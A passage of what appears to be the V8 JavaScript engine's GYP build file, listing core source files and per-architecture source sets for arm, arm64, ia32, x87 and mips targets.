'compiler/load-elimination.cc',
'compiler/load-elimination.h',
'compiler/loop-analysis.cc',
'compiler/loop-analysis.h',
'compiler/loop-peeling.cc',
'compiler/loop-peeling.h',
'compiler/loop-variable-optimizer.cc',
'compiler/loop-variable-optimizer.h',
'compiler/machine-operator-reducer.cc',
'compiler/machine-operator-reducer.h',
'compiler/machine-operator.cc',
'compiler/machine-operator.h',
'compiler/machine-graph-verifier.cc',
'compiler/machine-graph-verifier.h',
'compiler/memory-optimizer.cc',
'compiler/memory-optimizer.h',
'compiler/move-optimizer.cc',
'compiler/move-optimizer.h',
'compiler/node-aux-data.h',
'compiler/node-cache.cc',
'compiler/node-cache.h',
'compiler/node-marker.cc',
'compiler/node-marker.h',
'compiler/node-matchers.cc',
'compiler/node-matchers.h',
'compiler/node-properties.cc',
'compiler/node-properties.h',
'compiler/node.cc',
'compiler/node.h',
'compiler/opcodes.cc',
'compiler/opcodes.h',
'compiler/operation-typer.cc',
'compiler/operation-typer.h',
'compiler/operator-properties.cc',
'compiler/operator-properties.h',
'compiler/operator.cc',
'compiler/operator.h',
'compiler/osr.cc',
'compiler/osr.h',
'compiler/pipeline.cc',
'compiler/pipeline.h',
'compiler/pipeline-statistics.cc',
'compiler/pipeline-statistics.h',
'compiler/raw-machine-assembler.cc',
'compiler/raw-machine-assembler.h',
'compiler/redundancy-elimination.cc',
'compiler/redundancy-elimination.h',
'compiler/register-allocator.cc',
'compiler/register-allocator.h',
'compiler/register-allocator-verifier.cc',
'compiler/register-allocator-verifier.h',
'compiler/representation-change.cc',
'compiler/representation-change.h',
'compiler/schedule.cc',
'compiler/schedule.h',
'compiler/scheduler.cc',
'compiler/scheduler.h',
'compiler/select-lowering.cc',
'compiler/select-lowering.h',
'compiler/simd-scalar-lowering.cc',
'compiler/simd-scalar-lowering.h',
'compiler/simplified-lowering.cc',
'compiler/simplified-lowering.h',
'compiler/simplified-operator-reducer.cc',
'compiler/simplified-operator-reducer.h',
'compiler/simplified-operator.cc',
'compiler/simplified-operator.h',
'compiler/compiler-source-position-table.cc',
'compiler/compiler-source-position-table.h',
'compiler/state-values-utils.cc',
'compiler/state-values-utils.h',
'compiler/store-store-elimination.cc',
'compiler/store-store-elimination.h',
'compiler/tail-call-optimization.cc',
'compiler/tail-call-optimization.h',
'compiler/types.cc',
'compiler/types.h',
'compiler/type-cache.cc',
'compiler/type-cache.h',
'compiler/typed-optimization.cc',
'compiler/typed-optimization.h',
'compiler/typer.cc',
'compiler/typer.h',
'compiler/unwinding-info-writer.h',
'compiler/value-numbering-reducer.cc',
'compiler/value-numbering-reducer.h',
'compiler/verifier.cc',
'compiler/verifier.h',
'compiler/wasm-compiler.cc',
'compiler/wasm-compiler.h',
'compiler/wasm-linkage.cc',
'compiler/zone-stats.cc',
'compiler/zone-stats.h',
'compiler-dispatcher/compiler-dispatcher.cc',
'compiler-dispatcher/compiler-dispatcher.h',
'compiler-dispatcher/compiler-dispatcher-job.cc',
'compiler-dispatcher/compiler-dispatcher-job.h',
'compiler-dispatcher/compiler-dispatcher-tracer.cc',
'compiler-dispatcher/compiler-dispatcher-tracer.h',
'compiler-dispatcher/optimizing-compile-dispatcher.cc',
'compiler-dispatcher/optimizing-compile-dispatcher.h',
'compiler.cc',
'compiler.h',
'contexts-inl.h',
'contexts.cc',
'contexts.h',
'conversions-inl.h',
'conversions.cc',
'conversions.h',
'counters-inl.h',
'counters.cc',
'counters.h',
'crankshaft/compilation-phase.cc',
'crankshaft/compilation-phase.h',
'crankshaft/hydrogen-alias-analysis.h',
'crankshaft/hydrogen-bce.cc',
'crankshaft/hydrogen-bce.h',
'crankshaft/hydrogen-canonicalize.cc',
'crankshaft/hydrogen-canonicalize.h',
'crankshaft/hydrogen-check-elimination.cc',
'crankshaft/hydrogen-check-elimination.h',
'crankshaft/hydrogen-dce.cc',
'crankshaft/hydrogen-dce.h',
'crankshaft/hydrogen-dehoist.cc',
'crankshaft/hydrogen-dehoist.h',
'crankshaft/hydrogen-environment-liveness.cc',
'crankshaft/hydrogen-environment-liveness.h',
'crankshaft/hydrogen-escape-analysis.cc',
'crankshaft/hydrogen-escape-analysis.h',
'crankshaft/hydrogen-flow-engine.h',
'crankshaft/hydrogen-gvn.cc',
'crankshaft/hydrogen-gvn.h',
'crankshaft/hydrogen-infer-representation.cc',
'crankshaft/hydrogen-infer-representation.h',
'crankshaft/hydrogen-infer-types.cc',
'crankshaft/hydrogen-infer-types.h',
'crankshaft/hydrogen-instructions.cc',
'crankshaft/hydrogen-instructions.h',
'crankshaft/hydrogen-load-elimination.cc',
'crankshaft/hydrogen-load-elimination.h',
'crankshaft/hydrogen-mark-unreachable.cc',
'crankshaft/hydrogen-mark-unreachable.h',
'crankshaft/hydrogen-osr.cc',
'crankshaft/hydrogen-osr.h',
'crankshaft/hydrogen-range-analysis.cc',
'crankshaft/hydrogen-range-analysis.h',
'crankshaft/hydrogen-redundant-phi.cc',
'crankshaft/hydrogen-redundant-phi.h',
'crankshaft/hydrogen-removable-simulates.cc',
'crankshaft/hydrogen-removable-simulates.h',
'crankshaft/hydrogen-representation-changes.cc',
'crankshaft/hydrogen-representation-changes.h',
'crankshaft/hydrogen-sce.cc',
'crankshaft/hydrogen-sce.h',
'crankshaft/hydrogen-store-elimination.cc',
'crankshaft/hydrogen-store-elimination.h',
'crankshaft/hydrogen-types.cc',
'crankshaft/hydrogen-types.h',
'crankshaft/hydrogen-uint32-analysis.cc',
'crankshaft/hydrogen-uint32-analysis.h',
'crankshaft/hydrogen.cc',
'crankshaft/hydrogen.h',
'crankshaft/lithium-allocator-inl.h',
'crankshaft/lithium-allocator.cc',
'crankshaft/lithium-allocator.h',
'crankshaft/lithium-codegen.cc',
'crankshaft/lithium-codegen.h',
'crankshaft/lithium.cc',
'crankshaft/lithium.h',
'crankshaft/lithium-inl.h',
'crankshaft/typing.cc',
'crankshaft/typing.h',
'crankshaft/unique.h',
'date.cc',
'date.h',
'dateparser-inl.h',
'dateparser.cc',
'dateparser.h',
'debug/debug-coverage.cc',
'debug/debug-coverage.h',
'debug/debug-evaluate.cc',
'debug/debug-evaluate.h',
'debug/debug-interface.h',
'debug/debug-frames.cc',
'debug/debug-frames.h',
'debug/debug-scopes.cc',
'debug/debug-scopes.h',
'debug/debug.cc',
'debug/debug.h',
'debug/interface-types.h',
'debug/liveedit.cc',
'debug/liveedit.h',
'deoptimize-reason.cc',
'deoptimize-reason.h',
'deoptimizer.cc',
'deoptimizer.h',
'disasm.h',
'disassembler.cc',
'disassembler.h',
'diy-fp.cc',
'diy-fp.h',
'double.h',
'dtoa.cc',
'dtoa.h',
'effects.h',
'eh-frame.cc',
'eh-frame.h',
'elements-kind.cc',
'elements-kind.h',
'elements.cc',
'elements.h',
'execution.cc',
'execution.h',
'extensions/externalize-string-extension.cc',
'extensions/externalize-string-extension.h',
'extensions/free-buffer-extension.cc',
'extensions/free-buffer-extension.h',
'extensions/gc-extension.cc',
'extensions/gc-extension.h',
'extensions/ignition-statistics-extension.cc',
'extensions/ignition-statistics-extension.h',
'extensions/statistics-extension.cc',
'extensions/statistics-extension.h',
'extensions/trigger-failure-extension.cc',
'extensions/trigger-failure-extension.h',
'external-reference-table.cc',
'external-reference-table.h',
'factory.cc',
'factory.h',
'fast-dtoa.cc',
'fast-dtoa.h',
'feedback-vector-inl.h',
'feedback-vector.cc',
'feedback-vector.h',
'ffi/ffi-compiler.cc',
'ffi/ffi-compiler.h',
'field-index.h',
'field-index-inl.h',
'field-type.cc',
'field-type.h',
'find-and-replace-pattern.h',
'fixed-dtoa.cc',
'fixed-dtoa.h',
'flag-definitions.h',
'flags.cc',
'flags.h',
'frames-inl.h',
'frames.cc',
'frames.h',
'full-codegen/full-codegen.cc',
'full-codegen/full-codegen.h',
'futex-emulation.cc',
'futex-emulation.h',
'gdb-jit.cc',
'gdb-jit.h',
'global-handles.cc',
'global-handles.h',
'globals.h',
'handles-inl.h',
'handles.cc',
'handles.h',
'heap-symbols.h',
'heap/array-buffer-tracker-inl.h',
'heap/array-buffer-tracker.cc',
'heap/array-buffer-tracker.h',
'heap/code-stats.cc',
'heap/code-stats.h',
'heap/concurrent-marking.cc',
'heap/concurrent-marking.h',
'heap/embedder-tracing.cc',
'heap/embedder-tracing.h',
'heap/memory-reducer.cc',
'heap/memory-reducer.h',
'heap/gc-idle-time-handler.cc',
'heap/gc-idle-time-handler.h',
'heap/gc-tracer.cc',
'heap/gc-tracer.h',
'heap/heap-inl.h',
'heap/heap.cc',
'heap/heap.h',
'heap/incremental-marking-inl.h',
'heap/incremental-marking-job.cc',
'heap/incremental-marking-job.h',
'heap/incremental-marking.cc',
'heap/incremental-marking.h',
'heap/mark-compact-inl.h',
'heap/mark-compact.cc',
'heap/mark-compact.h',
'heap/marking.h',
'heap/object-stats.cc',
'heap/object-stats.h',
'heap/objects-visiting-inl.h',
'heap/objects-visiting.cc',
'heap/objects-visiting.h',
'heap/page-parallel-job.h',
'heap/remembered-set.h',
'heap/scavenge-job.h',
'heap/scavenge-job.cc',
'heap/scavenger-inl.h',
'heap/scavenger.cc',
'heap/scavenger.h',
'heap/slot-set.h',
'heap/spaces-inl.h',
'heap/spaces.cc',
'heap/spaces.h',
'heap/store-buffer.cc',
'heap/store-buffer.h',
'intl.cc',
'intl.h',
'icu_util.cc',
'icu_util.h',
'ic/access-compiler-data.h',
'ic/access-compiler.cc',
'ic/access-compiler.h',
'ic/accessor-assembler.cc',
'ic/accessor-assembler.h',
'ic/binary-op-assembler.cc',
'ic/binary-op-assembler.h',
'ic/call-optimization.cc',
'ic/call-optimization.h',
'ic/handler-compiler.cc',
'ic/handler-compiler.h',
'ic/handler-configuration-inl.h',
'ic/handler-configuration.h',
'ic/ic-inl.h',
'ic/ic-state.cc',
'ic/ic-state.h',
'ic/ic-stats.cc',
'ic/ic-stats.h',
'ic/ic.cc',
'ic/ic.h',
'ic/keyed-store-generic.cc',
'ic/keyed-store-generic.h',
'identity-map.cc',
'identity-map.h',
'interface-descriptors.cc',
'interface-descriptors.h',
'interpreter/bytecodes.cc',
'interpreter/bytecodes.h',
'interpreter/bytecode-array-accessor.cc',
'interpreter/bytecode-array-accessor.h',
'interpreter/bytecode-array-builder.cc',
'interpreter/bytecode-array-builder.h',
'interpreter/bytecode-array-iterator.cc',
'interpreter/bytecode-array-iterator.h',
'interpreter/bytecode-array-random-iterator.cc',
'interpreter/bytecode-array-random-iterator.h',
'interpreter/bytecode-array-writer.cc',
'interpreter/bytecode-array-writer.h',
'interpreter/bytecode-decoder.cc',
'interpreter/bytecode-decoder.h',
'interpreter/bytecode-flags.cc',
'interpreter/bytecode-flags.h',
'interpreter/bytecode-generator.cc',
'interpreter/bytecode-generator.h',
'interpreter/bytecode-label.cc',
'interpreter/bytecode-label.h',
'interpreter/bytecode-node.cc',
'interpreter/bytecode-node.h',
'interpreter/bytecode-operands.cc',
'interpreter/bytecode-operands.h',
'interpreter/bytecode-register.cc',
'interpreter/bytecode-register.h',
'interpreter/bytecode-register-allocator.h',
'interpreter/bytecode-register-optimizer.cc',
'interpreter/bytecode-register-optimizer.h',
'interpreter/bytecode-source-info.cc',
'interpreter/bytecode-source-info.h',
'interpreter/bytecode-traits.h',
'interpreter/constant-array-builder.cc',
'interpreter/constant-array-builder.h',
'interpreter/control-flow-builders.cc',
'interpreter/control-flow-builders.h',
'interpreter/handler-table-builder.cc',
'interpreter/handler-table-builder.h',
'interpreter/interpreter.cc',
'interpreter/interpreter.h',
'interpreter/interpreter-assembler.cc',
'interpreter/interpreter-assembler.h',
'interpreter/interpreter-generator.cc',
'interpreter/interpreter-generator.h',
'interpreter/interpreter-intrinsics.cc',
'interpreter/interpreter-intrinsics.h',
'interpreter/interpreter-intrinsics-generator.cc',
'interpreter/interpreter-intrinsics-generator.h',
'interpreter/setup-interpreter.h',
'interpreter/setup-interpreter-internal.cc',
'isolate-inl.h',
'isolate.cc',
'isolate.h',
'json-parser.cc',
'json-parser.h',
'json-stringifier.cc',
'json-stringifier.h',
'keys.h',
'keys.cc',
'label.h',
'layout-descriptor-inl.h',
'layout-descriptor.cc',
'layout-descriptor.h',
'list-inl.h',
'list.h',
'locked-queue-inl.h',
'locked-queue.h',
'log-inl.h',
'log-utils.cc',
'log-utils.h',
'log.cc',
'log.h',
'lookup-cache-inl.h',
'lookup-cache.cc',
'lookup-cache.h',
'lookup.cc',
'lookup.h',
'map-updater.cc',
'map-updater.h',
'macro-assembler-inl.h',
'macro-assembler.h',
'machine-type.cc',
'machine-type.h',
'managed.h',
'messages.cc',
'messages.h',
'msan.h',
'objects-body-descriptors-inl.h',
'objects-body-descriptors.h',
'objects-debug.cc',
'objects-inl.h',
'objects-printer.cc',
'objects.cc',
'objects.h',
'objects/code-cache.h',
'objects/code-cache-inl.h',
'objects/compilation-cache.h',
'objects/compilation-cache-inl.h',
'objects/descriptor-array.h',
'objects/dictionary.h',
'objects/frame-array.h',
'objects/frame-array-inl.h',
'objects/hash-table.h',
'objects/intl-objects.cc',
'objects/intl-objects-inl.h',
'objects/intl-objects.h',
'objects/literal-objects.cc',
'objects/literal-objects.h',
'objects/module-info.h',
'objects/object-macros.h',
'objects/object-macros-undef.h',
'objects/regexp-match-info.h',
'objects/scope-info.cc',
'objects/scope-info.h',
'objects/string-table.h',
'ostreams.cc',
'ostreams.h',
'parsing/duplicate-finder.h',
'parsing/expression-classifier.h',
'parsing/func-name-inferrer.cc',
'parsing/func-name-inferrer.h',
'parsing/parameter-initializer-rewriter.cc',
'parsing/parameter-initializer-rewriter.h',
'parsing/parse-info.cc',
'parsing/parse-info.h',
'parsing/parser-base.h',
'parsing/parser.cc',
'parsing/parser.h',
'parsing/parsing.cc',
'parsing/parsing.h',
'parsing/pattern-rewriter.cc',
'parsing/preparse-data-format.h',
'parsing/preparse-data.cc',
'parsing/preparse-data.h',
'parsing/preparsed-scope-data.cc',
'parsing/preparsed-scope-data.h',
'parsing/preparser.cc',
'parsing/preparser.h',
'parsing/rewriter.cc',
'parsing/rewriter.h',
'parsing/scanner-character-streams.cc',
'parsing/scanner-character-streams.h',
'parsing/scanner.cc',
'parsing/scanner.h',
'parsing/token.cc',
'parsing/token.h',
'pending-compilation-error-handler.cc',
'pending-compilation-error-handler.h',
'perf-jit.cc',
'perf-jit.h',
'profiler/allocation-tracker.cc',
'profiler/allocation-tracker.h',
'profiler/circular-queue-inl.h',
'profiler/circular-queue.h',
'profiler/cpu-profiler-inl.h',
'profiler/cpu-profiler.cc',
'profiler/cpu-profiler.h',
'profiler/heap-profiler.cc',
'profiler/heap-profiler.h',
'profiler/heap-snapshot-generator-inl.h',
'profiler/heap-snapshot-generator.cc',
'profiler/heap-snapshot-generator.h',
'profiler/profiler-listener.cc',
'profiler/profiler-listener.h',
'profiler/profile-generator-inl.h',
'profiler/profile-generator.cc',
'profiler/profile-generator.h',
'profiler/sampling-heap-profiler.cc',
'profiler/sampling-heap-profiler.h',
'profiler/strings-storage.cc',
'profiler/strings-storage.h',
'profiler/tick-sample.cc',
'profiler/tick-sample.h',
'profiler/tracing-cpu-profiler.cc',
'profiler/tracing-cpu-profiler.h',
'profiler/unbound-queue-inl.h',
'profiler/unbound-queue.h',
'property-descriptor.cc',
'property-descriptor.h',
'property-details.h',
'property.cc',
'property.h',
'prototype.h',
'regexp/bytecodes-irregexp.h',
'regexp/interpreter-irregexp.cc',
'regexp/interpreter-irregexp.h',
'regexp/jsregexp-inl.h',
'regexp/jsregexp.cc',
'regexp/jsregexp.h',
'regexp/regexp-ast.cc',
'regexp/regexp-ast.h',
'regexp/regexp-macro-assembler-irregexp-inl.h',
'regexp/regexp-macro-assembler-irregexp.cc',
'regexp/regexp-macro-assembler-irregexp.h',
'regexp/regexp-macro-assembler-tracer.cc',
'regexp/regexp-macro-assembler-tracer.h',
'regexp/regexp-macro-assembler.cc',
'regexp/regexp-macro-assembler.h',
'regexp/regexp-parser.cc',
'regexp/regexp-parser.h',
'regexp/regexp-stack.cc',
'regexp/regexp-stack.h',
'regexp/regexp-utils.cc',
'regexp/regexp-utils.h',
'register-configuration.cc',
'register-configuration.h',
'runtime-profiler.cc',
'runtime-profiler.h',
'runtime/runtime-array.cc',
'runtime/runtime-atomics.cc',
'runtime/runtime-classes.cc',
'runtime/runtime-collections.cc',
'runtime/runtime-compiler.cc',
'runtime/runtime-date.cc',
'runtime/runtime-debug.cc',
'runtime/runtime-forin.cc',
'runtime/runtime-function.cc',
'runtime/runtime-error.cc',
'runtime/runtime-futex.cc',
'runtime/runtime-generator.cc',
'runtime/runtime-intl.cc',
'runtime/runtime-internal.cc',
'runtime/runtime-interpreter.cc',
'runtime/runtime-literals.cc',
'runtime/runtime-liveedit.cc',
'runtime/runtime-maths.cc',
'runtime/runtime-module.cc',
'runtime/runtime-numbers.cc',
'runtime/runtime-object.cc',
'runtime/runtime-operators.cc',
'runtime/runtime-promise.cc',
'runtime/runtime-proxy.cc',
'runtime/runtime-regexp.cc',
'runtime/runtime-scopes.cc',
'runtime/runtime-strings.cc',
'runtime/runtime-symbol.cc',
'runtime/runtime-test.cc',
'runtime/runtime-typedarray.cc',
'runtime/runtime-utils.h',
'runtime/runtime-wasm.cc',
'runtime/runtime.cc',
'runtime/runtime.h',
'safepoint-table.cc',
'safepoint-table.h',
'setup-isolate.h',
'setup-isolate-full.cc',
'signature.h',
'simulator.h',
'small-pointer-list.h',
'snapshot/code-serializer.cc',
'snapshot/code-serializer.h',
'snapshot/deserializer.cc',
'snapshot/deserializer.h',
'snapshot/natives.h',
'snapshot/natives-common.cc',
'snapshot/partial-serializer.cc',
'snapshot/partial-serializer.h',
'snapshot/serializer.cc',
'snapshot/serializer.h',
'snapshot/serializer-common.cc',
'snapshot/serializer-common.h',
'snapshot/snapshot.h',
'snapshot/snapshot-common.cc',
'snapshot/snapshot-source-sink.cc',
'snapshot/snapshot-source-sink.h',
'snapshot/startup-serializer.cc',
'snapshot/startup-serializer.h',
'source-position-table.cc',
'source-position-table.h',
'source-position.cc',
'source-position.h',
'splay-tree.h',
'splay-tree-inl.h',
'startup-data-util.cc',
'startup-data-util.h',
'string-builder.cc',
'string-builder.h',
'string-case.cc',
'string-case.h',
'string-search.h',
'string-stream.cc',
'string-stream.h',
'strtod.cc',
'strtod.h',
'ic/stub-cache.cc',
'ic/stub-cache.h',
'tracing/trace-event.cc',
'tracing/trace-event.h',
'tracing/traced-value.cc',
'tracing/traced-value.h',
'tracing/tracing-category-observer.cc',
'tracing/tracing-category-observer.h',
'transitions-inl.h',
'transitions.cc',
'transitions.h',
'trap-handler/handler-outside.cc',
'trap-handler/handler-shared.cc',
'trap-handler/trap-handler.h',
'trap-handler/trap-handler-internal.h',
'type-hints.cc',
'type-hints.h',
'type-info.cc',
'type-info.h',
'unicode-inl.h',
'unicode.cc',
'unicode.h',
'unicode-cache-inl.h',
'unicode-cache.h',
'unicode-decoder.cc',
'unicode-decoder.h',
'uri.cc',
'uri.h',
'utils-inl.h',
'utils.cc',
'utils.h',
'v8.cc',
'v8.h',
'v8memory.h',
'v8threads.cc',
'v8threads.h',
'value-serializer.cc',
'value-serializer.h',
'vector.h',
'version.cc',
'version.h',
'visitors.cc',
'visitors.h',
'vm-state-inl.h',
'vm-state.h',
'wasm/decoder.h',
'wasm/function-body-decoder.cc',
'wasm/function-body-decoder.h',
'wasm/function-body-decoder-impl.h',
'wasm/leb-helper.h',
'wasm/local-decl-encoder.cc',
'wasm/local-decl-encoder.h',
'wasm/module-decoder.cc',
'wasm/module-decoder.h',
'wasm/signature-map.cc',
'wasm/signature-map.h',
'wasm/wasm-code-specialization.h',
'wasm/wasm-code-specialization.cc',
'wasm/wasm-debug.cc',
'wasm/wasm-external-refs.cc',
'wasm/wasm-external-refs.h',
'wasm/wasm-js.cc',
'wasm/wasm-js.h',
'wasm/wasm-limits.h',
'wasm/wasm-module.cc',
'wasm/wasm-module.h',
'wasm/wasm-module-builder.cc',
'wasm/wasm-module-builder.h',
'wasm/wasm-interpreter.cc',
'wasm/wasm-interpreter.h',
'wasm/wasm-objects.cc',
'wasm/wasm-objects.h',
'wasm/wasm-opcodes.cc',
'wasm/wasm-opcodes.h',
'wasm/wasm-result.cc',
'wasm/wasm-result.h',
'wasm/wasm-text.cc',
'wasm/wasm-text.h',
'zone/accounting-allocator.cc',
'zone/accounting-allocator.h',
'zone/zone-segment.cc',
'zone/zone-segment.h',
'zone/zone.cc',
'zone/zone.h',
'zone/zone-chunk-list.h',
'zone/zone-allocator.h',
'zone/zone-containers.h',
'zone/zone-handle-set.h',
],
'conditions': [
['want_separate_host_toolset==1', {
'toolsets': ['host', 'target'],
}, {
'toolsets': ['target'],
}],
['v8_target_arch=="arm"', {
'sources': [ ### gcmole(arch:arm) ###
'arm/assembler-arm-inl.h',
'arm/assembler-arm.cc',
'arm/assembler-arm.h',
'arm/code-stubs-arm.cc',
'arm/code-stubs-arm.h',
'arm/codegen-arm.cc',
'arm/codegen-arm.h',
'arm/constants-arm.h',
'arm/constants-arm.cc',
'arm/cpu-arm.cc',
'arm/deoptimizer-arm.cc',
'arm/disasm-arm.cc',
'arm/frames-arm.cc',
'arm/frames-arm.h',
'arm/interface-descriptors-arm.cc',
'arm/interface-descriptors-arm.h',
'arm/macro-assembler-arm.cc',
'arm/macro-assembler-arm.h',
'arm/simulator-arm.cc',
'arm/simulator-arm.h',
'arm/eh-frame-arm.cc',
'builtins/arm/builtins-arm.cc',
'compiler/arm/code-generator-arm.cc',
'compiler/arm/instruction-codes-arm.h',
'compiler/arm/instruction-scheduler-arm.cc',
'compiler/arm/instruction-selector-arm.cc',
'compiler/arm/unwinding-info-writer-arm.h',
'compiler/arm/unwinding-info-writer-arm.cc',
'crankshaft/arm/lithium-arm.cc',
'crankshaft/arm/lithium-arm.h',
'crankshaft/arm/lithium-codegen-arm.cc',
'crankshaft/arm/lithium-codegen-arm.h',
'crankshaft/arm/lithium-gap-resolver-arm.cc',
'crankshaft/arm/lithium-gap-resolver-arm.h',
'debug/arm/debug-arm.cc',
'full-codegen/arm/full-codegen-arm.cc',
'ic/arm/access-compiler-arm.cc',
'ic/arm/handler-compiler-arm.cc',
'ic/arm/ic-arm.cc',
'regexp/arm/regexp-macro-assembler-arm.cc',
'regexp/arm/regexp-macro-assembler-arm.h',
],
}],
['v8_target_arch=="arm64"', {
'sources': [ ### gcmole(arch:arm64) ###
'arm64/assembler-arm64.cc',
'arm64/assembler-arm64.h',
'arm64/assembler-arm64-inl.h',
'arm64/codegen-arm64.cc',
'arm64/codegen-arm64.h',
'arm64/code-stubs-arm64.cc',
'arm64/code-stubs-arm64.h',
'arm64/constants-arm64.h',
'arm64/cpu-arm64.cc',
'arm64/decoder-arm64.cc',
'arm64/decoder-arm64.h',
'arm64/decoder-arm64-inl.h',
'arm64/deoptimizer-arm64.cc',
'arm64/disasm-arm64.cc',
'arm64/disasm-arm64.h',
'arm64/frames-arm64.cc',
'arm64/frames-arm64.h',
'arm64/instructions-arm64.cc',
'arm64/instructions-arm64.h',
'arm64/instrument-arm64.cc',
'arm64/instrument-arm64.h',
'arm64/interface-descriptors-arm64.cc',
'arm64/interface-descriptors-arm64.h',
'arm64/macro-assembler-arm64.cc',
'arm64/macro-assembler-arm64.h',
'arm64/macro-assembler-arm64-inl.h',
'arm64/simulator-arm64.cc',
'arm64/simulator-arm64.h',
'arm64/utils-arm64.cc',
'arm64/utils-arm64.h',
'arm64/eh-frame-arm64.cc',
'builtins/arm64/builtins-arm64.cc',
'compiler/arm64/code-generator-arm64.cc',
'compiler/arm64/instruction-codes-arm64.h',
'compiler/arm64/instruction-scheduler-arm64.cc',
'compiler/arm64/instruction-selector-arm64.cc',
'compiler/arm64/unwinding-info-writer-arm64.h',
'compiler/arm64/unwinding-info-writer-arm64.cc',
'crankshaft/arm64/delayed-masm-arm64.cc',
'crankshaft/arm64/delayed-masm-arm64.h',
'crankshaft/arm64/delayed-masm-arm64-inl.h',
'crankshaft/arm64/lithium-arm64.cc',
'crankshaft/arm64/lithium-arm64.h',
'crankshaft/arm64/lithium-codegen-arm64.cc',
'crankshaft/arm64/lithium-codegen-arm64.h',
'crankshaft/arm64/lithium-gap-resolver-arm64.cc',
'crankshaft/arm64/lithium-gap-resolver-arm64.h',
'debug/arm64/debug-arm64.cc',
'full-codegen/arm64/full-codegen-arm64.cc',
'ic/arm64/access-compiler-arm64.cc',
'ic/arm64/handler-compiler-arm64.cc',
'ic/arm64/ic-arm64.cc',
'regexp/arm64/regexp-macro-assembler-arm64.cc',
'regexp/arm64/regexp-macro-assembler-arm64.h',
],
}],
['v8_target_arch=="ia32"', {
'sources': [ ### gcmole(arch:ia32) ###
'ia32/assembler-ia32-inl.h',
'ia32/assembler-ia32.cc',
'ia32/assembler-ia32.h',
'ia32/code-stubs-ia32.cc',
'ia32/code-stubs-ia32.h',
'ia32/codegen-ia32.cc',
'ia32/codegen-ia32.h',
'ia32/cpu-ia32.cc',
'ia32/deoptimizer-ia32.cc',
'ia32/disasm-ia32.cc',
'ia32/frames-ia32.cc',
'ia32/frames-ia32.h',
'ia32/interface-descriptors-ia32.cc',
'ia32/macro-assembler-ia32.cc',
'ia32/macro-assembler-ia32.h',
'ia32/simulator-ia32.cc',
'ia32/simulator-ia32.h',
'ia32/sse-instr.h',
'builtins/ia32/builtins-ia32.cc',
'compiler/ia32/code-generator-ia32.cc',
'compiler/ia32/instruction-codes-ia32.h',
'compiler/ia32/instruction-scheduler-ia32.cc',
'compiler/ia32/instruction-selector-ia32.cc',
'crankshaft/ia32/lithium-codegen-ia32.cc',
'crankshaft/ia32/lithium-codegen-ia32.h',
'crankshaft/ia32/lithium-gap-resolver-ia32.cc',
'crankshaft/ia32/lithium-gap-resolver-ia32.h',
'crankshaft/ia32/lithium-ia32.cc',
'crankshaft/ia32/lithium-ia32.h',
'debug/ia32/debug-ia32.cc',
'full-codegen/ia32/full-codegen-ia32.cc',
'ic/ia32/access-compiler-ia32.cc',
'ic/ia32/handler-compiler-ia32.cc',
'ic/ia32/ic-ia32.cc',
'regexp/ia32/regexp-macro-assembler-ia32.cc',
'regexp/ia32/regexp-macro-assembler-ia32.h',
],
}],
['v8_target_arch=="x87"', {
'sources': [ ### gcmole(arch:x87) ###
'x87/assembler-x87-inl.h',
'x87/assembler-x87.cc',
'x87/assembler-x87.h',
'x87/code-stubs-x87.cc',
'x87/code-stubs-x87.h',
'x87/codegen-x87.cc',
'x87/codegen-x87.h',
'x87/cpu-x87.cc',
'x87/deoptimizer-x87.cc',
'x87/disasm-x87.cc',
'x87/frames-x87.cc',
'x87/frames-x87.h',
'x87/interface-descriptors-x87.cc',
'x87/macro-assembler-x87.cc',
'x87/macro-assembler-x87.h',
'x87/simulator-x87.cc',
'x87/simulator-x87.h',
'builtins/x87/builtins-x87.cc',
'compiler/x87/code-generator-x87.cc',
'compiler/x87/instruction-codes-x87.h',
'compiler/x87/instruction-scheduler-x87.cc',
'compiler/x87/instruction-selector-x87.cc',
'crankshaft/x87/lithium-codegen-x87.cc',
'crankshaft/x87/lithium-codegen-x87.h',
'crankshaft/x87/lithium-gap-resolver-x87.cc',
'crankshaft/x87/lithium-gap-resolver-x87.h',
'crankshaft/x87/lithium-x87.cc',
'crankshaft/x87/lithium-x87.h',
'debug/x87/debug-x87.cc',
'full-codegen/x87/full-codegen-x87.cc',
'ic/x87/access-compiler-x87.cc',
'ic/x87/handler-compiler-x87.cc',
'ic/x87/ic-x87.cc',
'regexp/x87/regexp-macro-assembler-x87.cc',
'regexp/x87/regexp-macro-assembler-x87.h',
],
}],
['v8_target_arch=="mips" or v8_target_arch=="mipsel"', {
'sources': [ ### gcmole(arch:mipsel) ###
'mips/assembler-mips.cc',
'mips/assembler-mips.h',
'mips/assembler-mips-inl.h',
'mips/codegen-mips.cc',
'mips/codegen-mips.h',
'mips/code-stubs-mips.cc',
'mips/code-stubs-mips.h',
'mips/constants-mips.cc',
'mips/constants-mips.h',
'mips/cpu-mips.cc',
'mips/deoptimizer-mips.cc',
'mips/disasm-mips.cc',
'mips/frames-mips.cc',
'mips/frames-mips.h',
'mips/interface-descriptors-mips.cc',
'mips/macro-assembler-mips.cc',
'mips/macro-assembler-mips.h',
'mips/simulator-mips.cc',
'mips/simulator-mips.h',
'builtins/mips/builtins-mips.cc',
'compiler/mips/code-generator-mips.cc',
'compiler/mips/instruction-codes-mips.h',
'compiler/mips/instruction-scheduler-mips.cc',
'compiler/mips/instruction-selector-mips.cc',
'crankshaft/mips/lithium-codegen-mips.cc',
'crankshaft/mips/lithium-codegen-mips.h',
'crankshaft/mips/lithium-gap-resolver-mips.cc',
'crankshaft/mips/lithium-gap-resolver-mips.h',
'crankshaft/mips/lithium-mips.cc',
'crankshaft/mips/lithium-mips.h',
'full-codegen/mips/full-codegen-mips.cc',
'debug/mips/debug-mips.cc',
'ic/mips/access-compiler-mips.cc',
'ic/mips/handler-compiler-mips.cc',
'ic/mips/ic-mips.cc',
'regexp/mips/regexp-macro-assembler-mips.cc',
'regexp/mips/regexp-macro-assembler-mips.h',
],
}],
['v8_target_arch=="mips64" or v8_target_arch=="mips64el"', {
'sources': [ ### gcmole(arch:mips64el) ###
'mips64/assembler-mips64.cc',
'mips64/assembler-mips64.h',
'mips64/assembler-mips64-inl.h',
'mips64/codegen-mips64.cc',
'mips64/codegen-mips64.h',
'mips64/code-stubs-mips64.cc',
'mips64/code-stubs-mips64.h',
'mips64/constants-mips64.cc',
'mips64/constants-mips64.h',
'mips64/cpu-mips64.cc',
'mips64/deoptimizer-mips64.cc',
'mips64/disasm-mips64.cc',
'mips64/frames-mips64.cc',
'mips64/frames-mips64.h',
'mips64/interface-descriptors-mips64.cc',
'mips64/macro-assembler-mips64.cc',
